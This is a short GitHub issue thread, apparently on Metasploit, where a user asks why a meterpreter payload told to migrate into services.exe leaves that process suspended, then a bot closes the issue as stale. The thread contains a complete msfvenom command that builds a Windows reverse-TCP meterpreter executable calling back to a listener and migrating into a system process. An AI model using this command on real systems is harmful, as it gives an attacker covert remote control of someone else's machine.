PrependMigrate

[gabriel-maxx]

hello could someone tell me how to make this work? the services.exe process starts in a suspended way, I already tried to disable ppl wintcb and the same thing happens..

msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.1.16 lport=4444 prependmigrateproc=services.exe prependmigrate=true -f exe -o test.exe

[dwelch-r7]

@NightRaidGamer Hi sorry but I'm not sure I'm fully understanding your issue here, could you provide more detail as to what you'e trying to achieve and the debug output from msfconsole if you have that handy

[gabriel-maxx]

@NightRaidGamer Hi sorry but I'm not sure I'm fully understanding your issue here, could you provide more detail as to what you'e trying to achieve and the debug output from msfconsole if you have that handy

when we use "prependmigrateproc=anyprocess.exe" and "prependmigrate=true" it creates an identical copy of the specified process right? with other processes they work well I tested several but with services.exe this happens it starts in suspended mode I don't know why. and no reverse shell

[github-actions]

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here.
If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

[github-actions]

Hi again!

It’s been 60 days since anything happened on this issue, so we are going to close it.
Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.